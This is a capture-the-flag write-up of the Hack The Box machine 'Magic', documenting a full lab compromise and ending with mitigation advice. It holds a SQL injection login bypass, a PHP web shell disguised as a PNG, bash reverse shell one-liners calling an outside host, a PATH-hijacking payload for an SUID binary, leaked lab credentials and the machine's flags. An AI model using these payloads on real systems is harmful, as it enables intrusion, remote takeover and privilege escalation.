htb-writeups

Magic HTB Writeup

Executive Summary

A comprehensive penetration test of the Magic HTB machine revealed multiple critical vulnerabilities including SQL injection authentication bypass, insecure file upload leading to remote code execution, and privilege escalation through PATH hijacking of a vulnerable SUID binary.

Reconnaissance

Network Scanning

Target Declaration:

export target=10.129.49.31

Comprehensive Port Discovery:

sudo nmap -p- --min-rate 5000 -sT -vvv $target

Service Enumeration:

sudo nmap -p 22,80 -sC -sV -T4 $target

Findings

• Port 22: SSH service
• Port 80: HTTP service (Apache)

Web Application Assessment

Initial Discovery

Visiting http://10.129.49.31 revealed a web application with a login portal at /login.php.

Authentication Bypass

SQL Injection Vulnerability:

• Discovered SQL injection in login form
• Successful bypass using: admin' OR 1=1-- -

Payload Used:

Username: admin
Password: pass' OR 1=1-- -

Directory Enumeration

Gobuster Scan:

gobuster dir -u http://$target -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php -t 50

Key Findings:

• /upload.php - File upload functionality
• /images/ - Directory containing uploaded files

Initial Access

File Upload Vulnerability

Upload Bypass Technique:

• Added magic bytes (PNG) to PHP shell
• Modified Content-Type to image/png
• Used double extension: script.php.png

PHP Web Shell:

PNG
<?php system($_GET['cmd']); ?>

getting a success message

Remote Code Execution

Command Execution:

http://10.129.49.31/images/uploads/script.php.png?cmd=id

Reverse Shell Payload:

bash -c 'bash -i >& /dev/tcp/10.10.14.134/9001 0>&1'

Shell Obtained:

• User: www-data
• Access Level: Web application context

Post-Exploitation

Database Credential Discovery

Location: /var/www/Magic/db.php5

Credentials Found:

private static $dbName = 'Magic';
private static $dbHost = 'localhost';
private static $dbUsername = 'theseus';
private static $dbUserPassword = 'iamkingtheseus';

Database Enumeration

MySQL Dump:

mysqldump -u theseus -p Magic

Additional Credentials Discovered:

• Username: admin
• Password: Th3s3usW4sK1ng

switch the user to theseus using the password Th3s3usW4sK1ng

User Access

SSH Access:

ssh -i key theseus@10.129.49.31

Note:do a ssh-keygen in your local machine if you dont have a private and public key and then copy the key.pub public key to the ~/.ssh/authorized_keys and ssh into the box using the private key called key with ssh -i key theseus@10.129.49.31

User Flag:

cat /home/theseus/user.txt
9f6d3eacdb81678cfd6c06d3e82dc76d

Privilege Escalation

SUID Binary Analysis

Vulnerable Binary:

find / -perm -4000 -type f -user root -ls 2>/dev/null
/bin/sysinfo

Note:try to get setuid binaries owned by root find / -perm -4000 -type f -user root -ls 2>/dev/null we get the /bin/sysinfo which has setuid permission set which is owned by root and in the user group which theseus is a part of

Binary Analysis:

ltrace /bin/sysinfo

Vulnerability: Relative path usage for fdisk command

PATH Hijacking Exploitation

Malicious fdisk Payload:

#!/bin/bash
bash -c "bash -i >& /dev/tcp/10.10.14.134/4444 0>&1"

Exploitation Steps:

# Create payload
echo '#!/bin/bash' > /dev/shm/fdisk
echo 'bash -c "bash -i >& /dev/tcp/10.10.14.134/4444 0>&1"' >> /dev/shm/fdisk
chmod +x /dev/shm/fdisk

# Hijack PATH
export PATH="/dev/shm:$PATH"

# Execute vulnerable binary
/bin/sysinfo

Root Access Achieved

root@ubuntu:~# cat /root/root.txt cat /root/root.txt 7bcb8be400199d35a96ce942c767a9f1

Root Flag:

cat /root/root.txt
7bcb8be400199d35a96ce942c767a9f1

Vulnerability Analysis

Critical Security Issues

1. SQL Injection (Critical)
   • Unparameterized user input in authentication
   • Complete authentication bypass possible
2. Insecure File Upload (Critical)
   • Insufficient file type validation
   • Magic byte and Content-Type manipulation
   • Double extension bypass
3. Insecure SUID Binary (High)
   • Relative path usage in privileged binary
   • PATH environment variable hijacking
   • Lack of absolute path specification
4. Information Disclosure (Medium)
   • Database credentials in web root
   • Plaintext password storage

Mitigation Recommendations

Immediate Actions

1. Input Validation
   • Implement parameterized queries
   • Add input sanitization for all user inputs
   • Use prepared statements for database operations
2. File Upload Security
   • Implement server-side file type verification
   • Use whitelist approach for allowed extensions
   • Store uploaded files outside web root
   • Scan uploaded files for malicious content
3. System Hardening
   • Audit all SUID binaries
   • Use absolute paths in system calls
   • Implement principle of least privilege

Long-term Improvements

1. Secure Development
   • Regular security code reviews
   • Implement security testing in CI/CD pipeline
   • Developer security training
2. Monitoring & Detection
   • File integrity monitoring
   • Web application firewall
   • Intrusion detection system

Technical Indicators

Attack Timeline

1. Network reconnaissance → 2. Web application enumeration → 3. SQL injection authentication bypass → 4. File upload exploitation → 5. Remote code execution → 6. Database credential discovery → 7. User privilege escalation → 8. SUID binary exploitation → 9. Root compromise

Tools Utilized

• Nmap: Network scanning
• Gobuster: Directory enumeration
• Burp Suite: Web application testing
• Netcat: Reverse shell handling
• MySQL: Database interaction

Exploitation Techniques

• SQL Injection authentication bypass
• File upload filter bypass
• PATH hijacking privilege escalation
• SUID binary exploitation